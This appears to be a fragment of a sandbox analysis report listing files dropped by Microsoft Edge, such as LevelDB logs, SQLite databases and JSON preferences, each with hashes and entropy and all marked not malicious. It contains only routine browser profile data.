                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uUAq2P923oH+TcwtrQMxIFUtQuxPZmwuuRdkwO923oH+TcwtrQMFLJ:76u9v4YebCFUtQuxP/uuRd5LYebtJ
                                                                                                                                                                                                                                                                                                                          MD5:39583909CFFB09A503A8DC6A7A00DED4
                                                                                                                                                                                                                                                                                                                          SHA1:06C627DBCA128A3A3C17046128E4528117D98E66
                                                                                                                                                                                                                                                                                                                          SHA-256:630265D55C7081EB6991AC4E816E4B67D8A7BB3344D51F7BEED9252967715B37
                                                                                                                                                                                                                                                                                                                          SHA-512:4E37C1C05B31B463292C60EE78CEEDD7F2026D6A01B34D13D01BF4E022F014CA9EC5AB0CB882785173742ECABA5E5A67999A3542B195784818574CC324305477
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.946 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/12-11:23:05.947 bb0 Recovering log #3.2025/01/12-11:23:05.961 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.846443079620115
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:3hliMybBSlAyez4psAF4unxMtLp3X2amEtG1Chq9aMIVrWFAQKkOAM4:3hlipjIzFaLp2FEkChEajiRHOp
                                                                                                                                                                                                                                                                                                                          MD5:CA00D8AF9A996A2391EEA24C2C8E2406
                                                                                                                                                                                                                                                                                                                          SHA1:C0A6C3B81CF4175F5956F080198167B85160579E
                                                                                                                                                                                                                                                                                                                          SHA-256:8FA9F7A58708046294B60B74B197A8615BEDCD7A634384255EB168370D77629F
                                                                                                                                                                                                                                                                                                                          SHA-512:105294628A060E9271699849829069184B239FA522E741D3E3CAF0F859C95293774F21ED277B4C432276E7F39E48B687D5167C0054FEDE60BB958C8A71CF4F90
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SNSS.........O.............O......"..O.............O.........O.........O.........O....!....O.................................O..O1..,.....O$...fd89ab25_d94b_4705_bab3_e14bd5290f2f.....O.........O....C............O.....O.........................O....................5..0.....O&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......O.........O............................O.............O........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......2q@..+..3q@..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):352
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.125399604737209
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uGDOq2P923oH+Tcwt7Uh2ghZIFUtQuNdZmwuuNvkwO923oH+Tcwt7Uh2gnLJ:76uGqv4YebIhHh2FUtQuNd/uuNv5LYeQ
                                                                                                                                                                                                                                                                                                                          MD5:31020AB8BB836CF593BE9253BA07A82E
                                                                                                                                                                                                                                                                                                                          SHA1:2BFBDC9393B01C94F248113D65203ECC1BEFA214
                                                                                                                                                                                                                                                                                                                          SHA-256:D3F433233088ACF17150149643DD0FDEEED8BDBD645271B59D0FF00FE3009AE8
                                                                                                                                                                                                                                                                                                                          SHA-512:5B98E58A8F60FC130042693B137818F445771AD120F3738B368B13C51A0923C517E0AD4F89669489E8BD280C60DE957F5FFF4C55D8C52A6167DD2284F9B52EC0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.197 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/12-11:23:05.198 1fc4 Recovering log #3.2025/01/12-11:23:05.198 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.195056124533447
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76u6N4v4YebvqBQFUtQu6NJ/uuj5LYebvqBvJ:76u6M4YebvZgQu62u1LYebvk
                                                                                                                                                                                                                                                                                                                          MD5:1DE628137005CE8B9147D1CF196D31A5
                                                                                                                                                                                                                                                                                                                          SHA1:CF701EA760CA35357794CFE0B4AFDF7A18387091
                                                                                                                                                                                                                                                                                                                          SHA-256:403AC82FC1EDEDC9EC340396B576766F5BC4E6A3424C5BB4140EFFE4F511828E
                                                                                                                                                                                                                                                                                                                          SHA-512:62A2A026E5839E054103C89ABC629EFFEBD9AE1C2678D1620F6AEA82E9E305B0B3E57A13E68733068485F19BBA9C7953762BB66F38F64EF16707B9D6C799B024
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.906 ae4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.906 ae4 Recovering log #3.2025/01/12-11:23:05.909 ae4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.191964760509069
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:23.804 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/12-11:23:23.805 bb0 Recovering log #3.2025/01/12-11:23:23.809 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.191964760509069
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:23.804 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/12-11:23:23.805 bb0 Recovering log #3.2025/01/12-11:23:23.809 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.151554115714797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.194 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/12-11:23:05.194 1ff4 Recovering log #3.2025/01/12-11:23:05.194 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.151554115714797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.194 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/12-11:23:05.194 1ff4 Recovering log #3.2025/01/12-11:23:05.194 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.265130411026952
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMYSAELyKOMq+8yC8F/YfU5m+OlTLVum+:Bq+n0JY9ELyKOMq+8y9/Owd
                                                                                                                                                                                                                                                                                                                          MD5:1D5CF1DF51AACAAB4C9BC5F870931500
                                                                                                                                                                                                                                                                                                                          SHA1:ADEC7026A99F9E7BAFA34C90EACADC4AB146497C
                                                                                                                                                                                                                                                                                                                          SHA-256:934E4FD261421F160144C5F1FCA95B2A82ADFD64EE09F4A04D824270DC8F73D2
                                                                                                                                                                                                                                                                                                                          SHA-512:DB345A6C3628326B25B7B4A28E7A0F12913FBAF035AFDED90A0D257C51DEBDE3461F741598EA71DC012523BB1DBB0218E504A8FC609EBF64C24ECD31F7415A19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46662596747982116
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0Da:v7doKsKuKZKlZNmu46yjx0G
                                                                                                                                                                                                                                                                                                                          MD5:7817063E3ECD9122BF2ED948D3A07DC2
                                                                                                                                                                                                                                                                                                                          SHA1:74A249689BF065C56B741CE2EF8254FD51B12873
                                                                                                                                                                                                                                                                                                                          SHA-256:7BA422FEE12FFBF6B796841D8CDCABC0B8145E983946563B93267DC69D4A3764
                                                                                                                                                                                                                                                                                                                          SHA-512:3038DFB722C24547BBEE48ADC947B34B4A3AA1E57475F0DCDBB19505FFABEDC7D64BD3C70F1A4A6A93BF1611DEFC97B6457151A26E186F69CC30DFF23C8C99F1
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17023), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):17027
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4505040917342775
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBohbGIQwY6WTaTY7u:sTOxuJZf7UWbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:62F5B8A35E469BD70895DE901046F9AF
                                                                                                                                                                                                                                                                                                                          SHA1:BE243634FC429530384BD124FE4448406C5B1919
                                                                                                                                                                                                                                                                                                                          SHA-256:C4E2668D4A4F31E810A3863F116ADB2A48D10201D404C8D05D72506C1472E123
                                                                                                                                                                                                                                                                                                                          SHA-512:438361DB4631A6A0ACFA5B01AED7FA86C1F9336D95CC1F8A543D5E2897CC705270939D14169E52015F80161FCFD99B4BA4C9C6F895E0789C5A01A3715D76D86C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
